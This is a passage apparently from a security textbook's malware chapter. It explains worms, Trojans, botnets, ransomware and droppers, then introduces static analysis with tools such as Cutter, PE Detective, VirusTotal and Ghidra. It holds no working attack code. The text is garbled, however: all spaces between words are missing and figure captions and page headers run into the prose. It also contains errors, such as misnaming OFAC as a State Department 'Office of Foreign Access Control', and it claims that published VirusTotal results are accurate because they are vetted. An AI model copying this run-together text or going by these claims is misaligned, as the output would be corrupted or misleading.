million.Normally,wormsarethoughtofasmaliciousinnature,buttheydon’thavetobe.TherearecertainlynotoriouswormslikeCodeRedandNimda,whichcausedalotofdamagearoundtheworld.However,therearealsowormslikeWelchia/Nachi.Theintentofthatwormwastoremoveanotherworm,Blaster,andalsopatchsystemssotheywouldn’tbevulnerabletoBlasteranylonger.EvengettingridofmalwarelikeBlasterisn’tenoughinthefaceofaworm.Youcangetridofthemalware,butifyoudon’tremovethevulnerabilitythewormuses,thewormwilljustreinfectfromanothersource.Regardlessoftheintentoftheauthor,theproblemwithwormsistheresourceconsumptionandtheamountoftimeandresourcesrequiredtocleanupafterthemalware.Wormsaretypicallyindiscriminate.Iftheycanfindasystemandthevulnerabilitytheyareprogrammedtouseexistsonthatsystem,theyaregoingtotrytoinfectthatsystem.Thisincludessystemstheyhavealreadyinfected—­oncetheyhaveexploitedthevulnerability,theymaychecktoseeifthereisalreadyaninstanceoftheworm.Withmultipleworminstancespotentiallyattemptingtoattackasinglehost,networktrafficincreases.That’sjustthestartingpointforimpacttoanenterprisenetwork.Exploitingvulnerabilities,especiallymultipletimesatthesametime,canconsumeprocessorandnetworkresources.Maybeit’saminimalimpactandnoonereallynoticesit,butreallyvirulentwormscanhaveasignificantimpact,ashasbeenseenmanytimes.Theimportantthingtokeepinmindisthatawormpropelsitself.Itdoesn’trequireanyassistancefromtheuser.Thismeansthatithasawayofconnectingtoremotesystemsandexecutingitselfonthosesystems.Thisislikelyaresultofanetwork-­facingvulnerability.Asignificantchallengewithwormsisthatoncetheyhavefoundtheirwayintoanenvironment,theycantakeadvantageoftrustrelationshipsandlaxrestrictionsonnetworkcommunications.Systemsarecommonlyallowedtocommunicatewithothersystemsonthesamenetwork.Whentwosystemsinsidethenetworkcommunicatewithoneanother,calledeast-­westcommunications,itisgenerallyconsideredtobetrustedbecausebothsystemsareownedandmaintainedbytheorganization.Theexpectationistheyareunderthecontroloftheenterpriseandnotunderthecontrolofanattacker.Wormsdonotnecessarilyhavetobeexecutables.Therehavebeenwormsthatmakeuseofemailprogramsandcontactliststopropagate.YoumayhaveanHTMLemailthathasscriptembeddedinit.OncetheemailclientrenderstheHTML,itrunsthescript,andthescriptmakesuseofavulnerabilityorsomeotherpoorlyconfiguredmechanisminthe324 Chapter8  Malware■emailclient.Thewormaccessesthecontactlistandsendsacopyofitselftoeveryoneinthecontactlist.Thisalsoleadstothepotentialforreinfectionwherethemalwaremayhavebeenidentifiedandremoved.Ifyouareonmycontactlist,thereisagoodchancethateitherIamonyoursoryouknowsomeonewhohasmeontheircontactlist.Atsomepoint,amessageislikelytocomebacktome.Andthisisanotherareawherewormscanberesource-­consuming.Withsomanymessagespassingbackandforth,messagequeuesgetclogged,makingitharderforlegitimatemessagestogetthrough,anditwillrequireadministratorstogoinandmanuallyclearthequeues.TrojanATrojanisreallyjustanothertypeofmalware,commonlyavirus.Whatsetsitapartisthefactthatitappearstobesomethingitisn’t.Whileit’sprobablywellknown,itisnamedaftertheso-­calledTrojanhorse.ThestorygoesthattheGreeks,whileatwarwiththepeoplefromTroy,builtahorseasa“gift”fortheTrojans.InsidethegifthorsewereGreeks.Ratherthanbeingawoodenhorsestatue,itwasinfactaconveyanceforthedeliveryofGreeksoldierswhowaiteduntilnightfall,creptoutofthewoodenhorse,andattackedthecityofTroyfromtheinside.Inthesameway,malwarecalledaTrojanappearstobesomethingbenign,oftensomethingyoubelieveyouknow.Instead,itinfectsyoursystem.Becauseitexpectsausertobeinvolved,runningaprogramtheybelievetobesomethingotherthanthemalwareitactuallyis,aTrojanisjustaparticulartypeofvirus.Itinfectsyoursystemandneedsuserinvolvementandismalware.That’savirus.Youcouldconsideritatypeofsocialengineering,whereusersaretrickedintoexecutingthemalwarebymakingthembelieveit’ssomethingitisn’t.Itdoesn’talwayshavetobeanexecutable,bytheway.Itispossibletoreceiveadocumentthatyoubelievetobe,say,aninvoiceorareceipt.Youopenthefiletoseewhatitisandthenyouareinfected.Thisisacommonapproachwithsocialengineeringandemail.IfyouhappentohaveaJunkorSpamfolder,youmaylookandseeemailmessageswithattachments.ThoseattachmentsmayverywellbeinfectedPDFfiles.Often,youmayfindthatsomeoneissendingyousomethingtheyareclaimingtobeaninvoiceorsomesortoftrackingdocument.ThisisdifferentfromthecaseinwhichthereisaURLthatyouhavetovisit.ItwouldbeanattachmentorpotentiallyjustanHTML-­basedemailmessage.BotnetAbotnetcanbepartofthepayloadofavirusorawormandcouldalsobeinstalledbyaTrojanhorse.Whenyouhearthewordbotnet,it’sreallyreferringtoabotnetclientthatisbeinginstalled.Thebotnetistheentirecollectionofendpointsthathavebeeninfectedwithaparticularfamilyofmalware.Thebotnetclientisasmallpieceofsoftwarewhosepurposeistoconnectbacktocommand-­and-­controlinfrastructure(C&CorC2).We’llgetdeeperintothisinfrastructurelaterinthesection“MalwareInfrastructure.”TheclienttakesitscommandsfromtheC&Cinfrastructure.Thebotnetcouldbeusedforanynumberofpurposes,MalwareTypes 325butprimarilythepurposeofabotnetistogenerateincomeforitsowner.Thepurposeoftheclientsistofacilitatethatprocess.OneexampleistheZeuSbotnet.Thiswasoneofthefirstpiecesofmalwarethathadapackageyoucouldpurchaseandthenusetocreateyourownbotnetclient.ZeuScamewithabuilderthattookinaconfigurationfileandthencreatedamalwareexecutablethatcouldbeusedtoinfectsystems.YoucanseethebuilderinFigure 8.2.TheobjectiveofZeuSand,asaresult,theobjectiveoftheconfigurationistostealbankinginformationfrominfectedsystems.Thisallowstheattackertousetheauthenticationcredentialstostealmoneyfromthosebanks.YoucanconfigureZeuSbasedonthespecificbanksyouwouldliketotarget.FIGURE 8.2 ZeuSBuilderOnceZeuShasbeeninstalledonatargetsystem,itprovidesawayfortheattackertoaccessthesystemremotely.ZeuScancapturekeystrokesandextractbankaccountinformationtotransmittotheattacker.Ofcourse,theftisnottheonlythingabotnetclientiscapableof.Botnetsarealsousedtosendspamemails,hostwebserversthatcanshiftfromonesystemtoanother,orparticipateindistributeddenial-­of-­serviceattacks.Incaseswhereanattackerhasmillionsofsystemstheyhavecompromised,theyarecapableofsendinghundredsofgigabitsorpossiblyeventerabitspersecondinattacktraffic,enoughtotakealotofbusinessesofflinesotheircustomerscan’tconnect.326 Chapter8  Malware■RansomwareRansomwareisanothertypeofmalware.Thegoalofransomwareistoextortmoneyfromavictim.Ransomwareisaprogramthatencryptsaportionofavictim’sharddrive,wherepersonalfilesarestored.Insomecases,itmaybeimportantbusinessdocuments.Theattackerprovidesinstructionsforthevictimtosendmoney,usuallyinatypeofcryptocurrencylikeBitcoin.Theideabehindthisisthattheattackerwillprovidethedecryptionkeyoncetheransomhasbeenpaid.Withthedecryptionkey,thevictimcangettheirvaluabledataback.Typically,thereisatimelimitbeforethedataisdestroyedjusttoputalittleextraheatonthevictim.Oneofthebest-­knownfamiliesofransomwareisWannaCry.Thisisapieceofmalwarethataffectedhundredsofthousandsofsystemsaroundtheworld,wherepeoplehadnotmaintainedthecurrentpatchlevelontheirsystems.Figure 8.3showsthemessageyouwouldhavereceivedhadWannaCryinfectedyoursystem.Fortunately,fastactiononthepartofMicrosoft,alongwithmalwareresearchers,wasabletolimittheoverallnumberofdevicesimpactedaroundtheworld.Evenso,it’sestimatedtohavecostmillionstopotentiallybillionsofdollars.FIGURE 8.3 WannaCryransomdemandWannaCrywasspreadthroughtheuseofanexploitdevelopedbytheU.S.NationalSecurityAgency(NSA).TheexploitwasknownasEternalBlue,anditwaspartofacacheofMalwareTypes 327informationreleasedbyagroupknownastheShadowBrokers,whohadinfiltratedtheNSAtogetinformationabouttoolsandtacticsusedbyNSAemployeesworkingoncybersecurityandcyberwarfare.Itwasn’tmanymonthsafterthereleaseofthatinformationthatWannaCrystartedspreading.WhileWannaCryisdefinitelyransomware,thatrefersonlytowhatitdoesanddoesn’treallyreferatalltohowitspreads.So,isitavirusoraworm?Sinceitusedaremotevulnerabilitytoinfectsystems,itwascapableofconnectingtoothersystemsautomaticallyandinfectingthem.Sinceitwascapableofmovingonitsown,thatmakesitaworm.Thisisanexampleofhowasinglepieceofmalwarecouldbecategorizedinmultiplebuckets.WannaCryisaransomwareworm.2020 wastheyearofransomware.Attackershavediscoveredthatit’sfarmoreefficienttojustdemandmoneyfromvictimsthantryingtostealinformationandutilizeit.Traditionally,threatgroupshavefallenintothreecategories.Thefirstisintelligencedriven.Sometimes,thisgroupisreferredtoasnation-­states.Thesearegroupsthatarelookingforinformationsuchasintellectualpropertyfromcompanies.Thisintellectualpropertyisusedtoenhancethemarketcapabilitiesofstate-­sponsoredbusinesses.Thesecondgroupiscriminalorganizations.Thesearegroupsthatareonlyinitforthemoney.Theyarebusinesseswithemployeesandworkinghours.Theseemployeesmayhaverolesandresponsibilitiesjustlikeyouwouldinajobyouhad.Thefinalgroupishacktivists.Thesearepeoplewhoarejusttryingtomakewaves.Theyhaveapointtomakeandwilldoalotofdifferentthingstomakeit.Thismaybedefacingwebpagesorperformingdistributeddenial-­of-­serviceattacks.Sometimes,nation-­stateswillalsoengageinfinanciallymotivatedcrimestoobtainfundingtosupportcontinuedoperations.What’sbeenhappeningmore,especiallystartingin2020,isthesenation-­statesthatwerepreviouslyinterestedinintellectualpropertyhavebeenpivotingtoransomwareattacksbecausetheycanbesolucrative.InspiteofindicationsbytheU.S.DepartmentofState’sOfficeofForeignAccessControl(OFAC)thattheywillfinecompaniesthatpayransomware,companiesarepayingtheransomsimplybecauseit’smorecost-­effectivethantryingtorestore,evenincaseswherethecompanyhasarobustbackupinfrastructureandprocess.Additionally,insurancecompaniesmayalsomakethedecisiontopayonbehalfofthecompanybecausetheinsurancecompanyfindsitwillcostthemlesstopayoutaransomthantopayforthecostsofrecoveryifthecompanycanrecoverinamoretraditionalway.Therearealotofransomwarefamiliesinthewildtoday.Oneofthem,Maze,startedhittingcompaniesin2019andpickedupalotofsteaminearly2020.WhenMazehitsandencryptsfilesonsystems,themalwareleavesanimageonthebackgroundofavictimcomputer’sdesktopprovidingdetailsforpayment.Otherransomwarewillleaveatextdocumentsomewherethatwillbefoundwiththeransomdemand.AcommonrequirementispaymentinBitcoin,thoughothercryptocurrencies(digitalcurrenciesthatareprotectedandmadeanonymousthroughcryptographictechniques)maybeused.Increasingly,ransomwareoperatorsarealsostealingdata,thenholdingithostage.Theythreatentoreleasethedataunlesstheygetpaid.Additionally,moreandmore,theyareannouncingthedatatheftasawaytoshamecompaniesinthehopesthattheshamemaybeamotivationtopay.Companiesmayfinditbettertopaythisransomthanbeshamedandpotentiallylosecustomersbecausethesecustomershavediscoveredtheirdatawasstolen328 Chapter8  Malware■fromthecompany.Additionally,somecompaniesmayhavetopayregulatoryorotherfines.Itmaybecheaperandbetterforbusinesstopaytheransomdemand.Insomecases,ransomwaremayhavepubliclyavailabledecryptors.Ifyoucanfindadecryptor,youmaybeabletouseittonotpaytheransom.Theproblemwiththesedecryptorsistheymayalsocontainmalware,dependingonwhereyoumayhavefoundthem.Notallsourcesofthissoftwarearereputable,perhapsunsurprisingly.Onethingthat’sknownaboutmodernransomwareisthattheattackersmaystagetheransomwareforlongperiodsoftimebeforeit’striggeredtoencryptthedataonsystems.Thiswasthecasewithhealthcareorganizationsin2020.Attackerswerethoughttohavestagedransomwareinhealthcareorganizationsaroundtheworld.TheFederalBureauofInvestigation(FBI)announcedtheexpectationthathealthcareorganizationsshouldbevigilantbecauseofcredibleintelligenceindicatingthataransomwareoperatorhadstagedsoftwareinanumberofhospitalsandotherhealthcare-­relatedbusinesses.Thistechniqueofstagingbeforetriggering,whiledevastatingforbusinesses,issmartpractice.Incaseswhereransomwareisdetectedwithinanenvironment,itmaybepossibletocontaintheoutbreakasitisspreadingifitisencryptingassoonasanewsystemisinfected.Instead,ifyouwaittoencryptuntilallpossiblesystemshavebeeninfected,thereisagreaterchancetheorganizationwillhavetopay.DropperAdropperisatypeofmalwarethatdoesn’tcommonlycomealone.Thedropperisusedasastartingpoint.Onceitisinstalledonyoursystem,itstartsgrabbingothersoftwaretoinstall.Thismayincludebackdoors,keyloggers,botnetclients,Trojans,orothersoftwarethatisusefultotheattacker.Theremaybemanyreasonsforusingadropperratherthanjustsimplyincludingallthefunctionalitythedroppertheninstalls.Itcouldbetokeepthesizeoftheinitialinfectiontoaminimum.Itcouldalsobethatthedroppercouldavoiddetectionwheretheothersoftwaremaybemoreeasilydetected.Onceallofthesoftwaretheattackerwantsonthesystemisinplace,thedroppercanremoveitselfsoitcan’tbelocated.Thissortofmultistageattackaddslayerswhenitcomestonotonlydetectionbutalsoanalysis.AdroppercouldalsoincludefunctionalitytoactasaTornodesoitcouldpullmalwareoutoftheTornetwork.Thiscouldalsohelpavoiddetection,especiallyasTormaynotusecommonpathwaysthatcouldbeidentified.Ontopofthat,itwouldutilizeencryption,whichmakesitmuchhardertodetectifthesecuritydevicescan’tgrabandproxyknownHypertextTransferProtocol(HTTP)paths(ports).MalwareAnalysisBeforewegoanywherewithanalysis,youshouldknowwe’regoingtobeusinganumberoftoolstodotheanalysis.Ratherthangrabbingallthetoolsandinstallingthemindividually,youmayfinditeasiertomakeuseofapackagethatwillinstallthemallforyou.Wewon’tbemakinguseofKalithistimearound.Instead,we’regoingtouseWindows-­basedMalwareAnalysis 329tools.Thereissomedangerinthis.ThemajorityofmalwareiswrittenforWindowssystemsbecauseitisthepredominantdesktopandtheonemostlikelytobeusedbypeoplewhomaybesusceptibletomalwareandsocialengineeringattacks.SinceyoumaybeworkingonmalwarewrittenforWindowssystems,youhavetobecarefulworkingwithit.Anymistakeandyou’llfindyouareworkingonacompromisedsystem.Togetthetoolsweneedinstalled,youcantakealookataPowerShellscriptthatwaswrittenbymembersoftheFireEyeLabsAdvancedReverseEngineering(FLARE)team.ItisavailableattheFLAREteam’sGitHubsite(https://github.com/fireeye/flare-­vm).Theinstall.ps1scriptwillinstallallthenecessarytoolsautomatically,makinguseoftheChocolateypackagemanager.We’regoingtolookatthetwotypesofmalwareanalysis.Thefirst,staticanalysis,looksatthecodetoanalyzeit.We’llmakeuseoftoolsthatwillshowustheexecutablecodewithoutactuallyrunningtheprogram.Asnotedearlier,runningtheprogramisthelastthingwewanttodo.Thesecondtypeofmalwareanalysisisdynamic.Withdynamicanalysis,weactuallyrunthemalwareandobservethebehavior.Asyoumightexpect,thistakesplanningandpreparationand,ofcourse,alotofcare.Therearetechniqueswecanusetoallowthattohappen.Ofcourse,it’simportanttonotonlyrunthemalwarebutalsomonitorthesystemsowecandeterminewhatthemalwareisdoing.Onewaytoperformthisanalysisistohavevirtualenvironments.Thereareseveralreasonsforthis.Oneistheabilitytosnapshottheenvironment.Thismeansyoucanalwaysrevertbacktoaknown,cleanstate,assumingyouremembertotakethesnapshot.Thisiswheresomeofthecarecomesfrom.Youneedtomakesureyouaretakingsnapshotsattherighttimeand,ideally,keepingtrackofwhateachsnapshotis.Somevirtualmachine(VM)softwarewillallowyoutolabelthesnapshot.Bydefault,itmayjustputadateandtimestamponthesnapshot.Thedateandtimestampisn’tverydescriptive,soifthat’sallthereistoidentifythesnapshot,youmaysimplynotknowwhatstateitwasin.WMsoftwareisfairlyeasytocomeby.Thereareseveralwaystosetupalab.YoucandoalabonasingleboxusingahypervisorlikeVMware.Thiscouldallowyoutohavemultiplevirtualsystems.Itwouldalsoallowyoutocontrolthenetworkingsothemalwareisn’tabletophonehome.ThereisachallengetodoingmalwareanalysisinVMs,though.Somemalwareiscapableofrecognizingthatit’srunninginaVM,anditmaynotexhibitanyofitsnormalbehaviorsinthatcase.Thisismeanttomakeitappeartobebenignandevadeanalysis.Itisoneofthereasonsstaticanalysiscanbesoimportant—­becauseyouaren’trelyingonthemalwaretoexposeitselfinamonitoredcondition.StaticAnalysisStaticanalysisofmalwareiswhenwelookatthedetailsofthemalwaresamplewithoutrunningit.Thiscanincludethepropertiesofthefileaswellastheactualcode.That’swhereittakesalotofpracticeandskill,though.WhenIsaywearelookingattheactualcode,Imeanwearelookingatthedisassemblyoftheprogram,revertingtoassemblylanguageratherthanthebinaryopcodes(operationcodes).Notsurprisingly,then,inordertobegoodatthataspectofstaticanalysis,youneedtounderstandassemblylanguage.Otherwise,youarejuststaringatalistofmnemonicsthatdon’tmeanmuchtoyou,aswellasalotof330 Chapter8  Malware■hexadecimalvalues.Thegoodthingaboutlookingatthedisassemblyoftheprogramfileisthatyouarelookingattheprogram.It’snotlikehidingtheexistenceofthemalwarebecausethehashvaluechangesandantiviruscan’tdetectit.Ifyoucanreadthroughtheprogramfromthedisassembly,youwillknowwhattheprogramisdoing.We’llstartsimply,though.We’regoingtolookatsomeofthepropertiesofthefile.Sinceitdoesn’tmattermuchatthispointwhatwelookat,becauseallprogramswillhavetheseproperties,we’regoingtolookatasimpleprogramIwroteinC.Thevaluesofthepropertieswillbedifferentfromoneprogramtoanother,andtherearesomepropertieswe’regoingtospendsometimelookingattodetermineifitmaybemalwareandthenwhatthatmalwaremaybeupto.Todothis,we’regoingtouseaprogramcalledCutter.Asastart,wecantakealookatanoverviewoftheexecutable,asshowninFigure 8.4.WecantellfromtheoverviewwhatCPUarchitecturetheexecutableisfor—­whetherit’sfor32-­bitor64-­bit,forinstance.Additionally,wecandeterminethatthefileformatisaportableexecutable.Theportableexecutable(PE)fileformatwrapstheexecutablecodealongwithinformationthattheoperatingsystemloaderneedstoplacetheprograminmemoryandstartexecution.PEfilesaren’tonly.exefiles.Theycanalsobedynamiclinklibraries(DLLs).FIGURE 8.4 OverviewofPEinCutterThegoalofaPEfile,asnotedearlier,istoprovideinformationfortheloadertoget alltheelementsoftheprogramintomemory.WecanlookatthedifferentelementsusingCutter.Figure 8.5showsalistoftheprogramsectionsfromoursampleprogram.Whenaprogramiscompiled,itisbrokenintomultiplesections,whichareidentifiedwithlabelssotheoperatingsystemloaderwillknowwhattodowiththem.TherearemultiplesectionsthatmaybepartofPEfiles,butwe’regoingtofocusonacoupleofthemspecifically.ThefirstMalwareAnalysis 331sectionisthe.textsection,whichisalltheexecutablecode.Anothersectionisthe.datasection,whichcontainsallinitializeddataintheprogram.Thismeansit’sdatathatisknownaboutatcompiletime.Variablesthataredefinedwhentheprogramiscompiled,withvaluesassigned,arestoredinthe.datasection.Thereisalotofdatathatisonlyknownaboutandassignedatruntime.Thatisstoredsomewhereelse.FIGURE 8.5 PortableexecutablesectionsPackersand EncryptorsThereasonforbringingthesesectionsupspecificallyisthatyoucangetsomehintsastowhetheraprogramyouarelookingatismalwareornot.Thereareprogramsthatcandelivermalwarecalledpackers.Theseareprogramsthathaveasmallexecutablesection.Theobjectiveofthatsmallexecutable,sometimescalledastub,istotaketherealprogramandeitherunpackit,becauseit’scompressed,orsometimesdecryptit.Oncetheexecutablebitsaredecompressedordecrypted,anewthread,orforkedprocess,getsstartedupandcontrolgetshandedtothoseexecutablebits.Packersandencryptorsareusedtohelpgetbyantivirusprograms.Theonlythingthattheantivirusprogramseesisthestubprogram.Thecompressioncouldbeaschemetheantivirusdoesn’tknowhowtohandle,andthesamecouldbetrueoftheencryption.Additionally,withoutthekey,theantivirusprogramcan’tseeinsidethedataanyway.Antivirusprogramsoftenworkwithsignatures.Asimplechangetotheencryptionkeycouldalterthesignatureofanyexecutable,meaningitwillevadeantivirus.Changingparametersofthecompressionwillalsochangethesignature.Thismakesanalyzingthemalwareimportant.KeepinmindtheinformationfromFigure 8.4thatshowedthedifferentsectionsandtheirsizes.Typically,the.textsectionisgoingtobethelargest.ThisisthecasefromFigure 8.4.Inthecaseofanyprogramthatispackedorencrypted,thestubprogram,whichwouldbeinthe.textsection,wouldberelativelysmall,whilethe.datasectionwouldbelarge.While332 Chapter8  Malware■Cutterisaveryversatiletoolforanalyzingexecutables,itdoesnotidentifypackedexecutables.Forthat,wecanturntoanotherprogram,suchasPEDetective.OneadvantageofPEDetectiveisthatwecanscanentiredirectoriestoidentifytheprograms.InFigure 8.6,youcanseetheoutputofacollectionofmalwarefromadirectory.You’llseethatthereareafewthathavebeenpackedwithdifferentpackers.OnecommonpackerisUPX,whichyoucanseewasusedhere.FIGURE 8.6 LookingforpackersYouwillalsonoticethatPEDetectivecandeterminethecompilerthatwasusedfortheprogram,whichmaybeofsomeinterest.Interestingly,openingtheseprogramsbackinCutter,thereareacoupleofpropertiesoftheexecutableworthtakingalookat.Thefirstisthat,unlikethepreviousprogramwelookedat,wherewecouldseethedifferentsectionsintheprogramandthegraphshowingtheirrelativesizes,therearenosectionsintheexecutablethat’spackedwithUPX.Wecangetanideaofwhatishappening,though,bylookingatanothersetofdetails.Thelackofatleasta.textsectionissuspicious,butwhenwelookattheentrypoint,thememoryaddressatwhichtheoperatingsystemistoldtostartexecution,wecanseesomethinginterestinginFigure 8.7.AtthetopofFigure 8.7,thereisafunctionidentifier.Thisisalabelthatpointstoaplaceinmemory.YoucanseethattheidentifierisUPX1:entry0.ThistellsustheprogramwaspackedwithUPX1andentry0isthelabelforthedecompressionstubcode.Thelabelentry0indicatestheentrypointfortheprogram.Ofcourse,youmayendupwithMalwareAnalysis 333compressedexecutableswithoutclearindicatorslikethis.UPXis,though,oneofthemostpopularandcommonlyusedprogramstocompressexecutables.FIGURE 8.7 EntrypointformalwareDisassemblyThemosteffectivewaytoseewhataprogramisgoingtodo,shortofrunningit,istolookatthecode.Wecan’tlookatthesourcecode,butwecandisassembletheexecutable.Theprocessofdisassemblyistakingtheexecutablecode,storedastheoperationscodes(opcodes)thattheCPUunderstands,andconvertingthembacktosomethingthat’smoreunderstandableforhumans—­assemblylanguage.Ofcourse,assemblylanguageisn’tthemostreadablelanguage.Atbest,yougetsomethingthat’smoreunderstandablethanjustnumbers.Disassemblyconvertsoperationcodestomnemonics.Amnemonicisamemoryassisttechnique.Oftenyouwillseeaphrasewheretheinitialletterofeachwordinthephrasemapstosomethingyouneedtoremember.That’sonetypeofmnemonic.Inourcase,wegetthreeorfourletterstoindicatewhateachopcodedoes.InFigure 8.8,youcanseeasectionofaprogramthathasbeendisassembled.Therearealotofprogramsthatcanperformadisassembly.WearelookingatthedisassemblyinCutter.Thisisjustaread-­onlyviewoftheprogram.Cutterdoesn’tgiveustheabilitytoexecutetheprogramoralteritinanyway.Thereareotherprogramsthatcanperformadisassemblyandalsogiveusawaytocontroltherunoftheprogram.Sinceweareperformingastaticanalysis,wedon’tactuallywanttorunit,sowhatwearegettingfromCutterisperfect.334 Chapter8  Malware■FIGURE 8.8 ProgramdisassemblyinCutterThisiswhereitgetshard,though.Tounderstandwhatishappening,weneedtobeabletoreadassemblylanguage,whichissomethingthattakessomepractice.Wherehigh-­levelprogramminglanguagesgiveusvariablestoworkwith,assemblylanguagegivesusmemorytoworkwith.Anydatathatanopcodeneedstoacton,calledanoperand,isstoredinatypeofmemorycalledaregister.Thisisafixed-­lengthmemorylocationthat’sstoredontheCPU,makingaccesstoitveryfast.Weneedtobeabletogetdataintotheregisters,though,whichmeansweneedsomethinglikethemovoperation.Asyoumightexpect,thismovesinformationfromoneplacetoanother.InthesecondlineofcodefromFigure 8.8,youcanseeamovwheredataismovedoutofamemorylocationandintoaregister.Someregistershavespecificfunctions.Forexample,themovoperationonthesecondlineofcode,movesi,0x405000,usesaregisterreferredtoasesi.Thisisageneral-­purposeregisterthatisoftenusedtostorememoryaddresses.Specifically,itstoresasourceaddress.Theediregisterstoresdestinationaddresses.Thethirdlineofcodeshowsanoperationlea,whichisshorthandforloadeffectiveaddress.Thisallowstheediregistertocontaintheresultofacomputation,whichisshowninsquarebrackets.Thereferencetoesiinthatlinereturnsthecontentsofthatregister,whichisamemoryaddress.Thehexadecimalvalue0x4000issubtractedfromthatmemoryaddressandtheresultisloadedintotheediregister.Thevalueinthisregisterispushedontothestack.Onereasonforpushingvaluesontothestackistoprepareforafunctioncall.Thisiscommonlydoneusingthecallmnemonic,thoughyoucoulddoitwithsomeversionofajump.Thejumpisusedtopassexecutiontoadifferentmemorylocation.MalwareAnalysis 335Therearemultipleversionsofjump.Someofthemaremeanttofollowacompare(cmp)andareusedtojumpifaregistervalueisnonzero,forinstance.Asyoulookthroughthedisassembly,youwillalsoseealotofarithmeticoperations,includingaddandsub(forsubtract).Youwillalsoseeinc,whichisthemnemonicforincrement,meaningweareaddingone.Thedifferenceisthatyoudon’thavetotakemultiplestepstoretrieveavalue,addonetoit,storetheresult,andthenmoveitbacktotheregisteritcameoutof.Performingastaticanalysisbyfollowingthecodeistime-­consumingifyoudon’twanttoruntheprogram.Runningtheprogramwhenyouhaveapotentialmalwaresampleisdangerous.Youcouldbecausingdamagetofilesonyoursystem,oryoucouldbeinfectingothersystemsonyournetwork.Usingastaticanalysisinthisway,asindicatedearlier,istime-­consumingandrequiresasolidunderstandingofthebehaviorofdifferentoperationscodes.PropertiesInadditiontolookinginsidetheprogramfile,wecanjusttakealookatsomeofthemetadataassociatedwithit.Thiscanincludethecompiledateandtime,forinstance.Someofthedataisnotonlyspecifictotheexecutablebutgenericacrossallfiles.Gettingthefilepropertiescanshowyouthecreated,accessed,andmodifieddatesandtimes.It’spossiblethiscangiveyousomeinformationaboutthemalwareandcertainlyaboutwhathashappenedonyoursystem.Whenyoubringuppropertiesonanexecutablefile,yougetatabnamedDetails.Withanexecutable,yougetinformationlikeproductnameandcopyright.YoucanseethisinFigure 8.9.FIGURE 8.9 Propertiesonexecutable336 Chapter8  Malware■Inthiscase,thereisn’tanyinformationbecausenothingwasspecifiedforthecompilertoputintothefile.Ifyouweretolookatanyofthesystemfiles,asexamples,youwouldseeMicrosoftCorporationasthecopyrightholder.Youwouldalsogetinformationaboutwhattheprogramis,potentially.Thisisnottosaythatmalwareauthorsaregoingtoputtheirnamesin.Infact,youmayfindbogusinformationhere.Onethingsoftwarevendorscando,though,istosigntheexecutable.Thismeansaddingacryptographicsignature.Largevendors,especiallyMicrosoft,willsigntheexecutable.EvenifamalwareauthorinsertsinformationintothemetadatasuggestingthefileisfromMicrosoft,theexecutablewillnothavetherightcryptographicsignature.Youshouldbeabletoseethatthesignaturewasn’tmadewithalegitimateMicrosoftcertificate.VirusTotalAnotherwaytoperformastaticanalysiswithoutexecutingtheprogramistoobtainahashofthesample.Therearedifferenthashalgorithmsthatcanbeused.AcommononeisMessageDigest5(MD5).Thisisahashalgorithmthathasbeenaroundfordecades.It’swellknown,andwhiletherearesomeapplicationsforwhichitisn’tthebestapproachbecauseitcanbepronetocollisions(instanceswheretwodifferentdatasetsgeneratethesamevalue),obtainingafilehashforanalysisofmalwareisnotgenerallyconsideredtobeoneofthem.Inthefollowinglisting,youcanseearunofahashingalgorithmonaWindowssystemtogetanMD5sum.Gettingan MD5HashC:\Users\kilroy\Documentsmd5sum.exebogus.exe846693bf0c4c678e9727cfade75ebce3*bogus.exeC:\Users\kilroy\DocumentsYoucan,ofcourse,useadditionalhashingalgorithmsliketheSecureHashAlgorithm(SHA).SHA-­1generatesalongerhashthanMD5does,whichmeansthespacethathashescanbegeneratedinismuchlarger.SHA-­1isslowlybeingreplacedbySHA-­256,whichisconsiderablylargerthanSHA-­1.ThechanceofcollisionsissignificantlysmallerthaninSHA-­1andcertainlysmallerthaninMD5.Onceyouhaveahashvalue,youcanuseittocheckdatabasesofmalware,whichcommonlystorehashvaluestocompareagainst.Antivirusprogramsgenerallymatchhashvaluestoknownmalware.Thereisawebsiteyoucangotothatwillcomparemalwareagainstmultipleantivirusprograms.VirusTotalcurrentlychecksagainst60antivirusprograms.Ifyouhaveafile,youcanuploadit,andVirusTotalwillcheckthefilebyobtainingahashandcomparingthehashagainstthedozensofantivirusprograms.Figure 8.10showstheresultoftestingaPDFthatwasinmyJunkMailfolder.Thisappearstobeaphishingattempt.MalwareAnalysis 337FIGURE 8.10 VirusTotalresultsFigure 8.10showshowthedifferentanti-­malwareprogramsidentifythesample.Outof60antivirusprograms,9ofthemidentifythissampleasmalware.Alloftheothersidentifyitasclean.Thisjusttellsuswhattheantivirusprogramsthink.Itdoesn’tgiveusanydetails.IfwegototheDetailstab,wewillgetthehashvaluesfromthedifferentcryptographicalgorithms.Figure 8.11showsadditionalpropertiesonthefile,includingmultiplehashes,thefiletype,andthefirsttimethisfilewassubmittedtoVirusTotal.Thisisapparentlyareasonablyrecentsample,asitwasfirstsubmittedjustacoupleofweeksbeforethissubmission.FIGURE 8.11 VirusTotaldetails338 Chapter8  Malware■Inadditiontothatdata,theDetailstabcontainsdetailsaboutcommonlyabusedpropertiesofPDFfilesandthenumberofinstancesthatshowupinthesampleprovided.ItalsoprovidesdetailsoftheExifFilemetadata.WithVirusTotal,youcanmakeuseoftheanalysisdonebyothers,whichcanhelpsaveyoualotofwork.However,itdoesmeanthatyouwon’thavethefunofdoingtheanalysisyourself.Becauseit’spublished,though,itmeansthatitisaccurate,sinceitwouldhavebeenvettedbyothers.UsingGhidraGhidraisatooldevelopedbytheNationalSecurityAgency(NSA)andreleasedforpublicuse.Thisisatoolthatcanbeusedforstaticanalysisbyprovidingextensivedetailsabouttheexecutableunderinvestigation.Insomesenses,it’smuchlikeadebuggeralongthelinesofIDAPro,acommondebuggerusedbyreverseengineeringprofessionals.TheproblemwithIDAPro,ifyoucancallitthat,isthatit’scommercialsoftware.GhidrahasmanyofthesamefeaturesthatmakeIDAProattractive,includingscriptingtomakeanalysiseasier,withoutthecost.It’salsocross-­platformsinceit’sprimarilywritteninJava.AslongasyoucangetaJavaDevelopmentKit(JDK)installedonyoursystem,youshouldbeabletorunGhidra.YoucanmanagemultipleexecutableswithinasingleGhidraproject.WhenyouopenanexecutableinGhidra,youwillbepresentedwithanumberofoptionsforanalysis.ThisanalysiswillbeautomatedwithalloftheintelligenceembeddedintoGhidra.YoucanseesomeoftheoptionsavailableinFigure 8.12.FIGURE 8.12 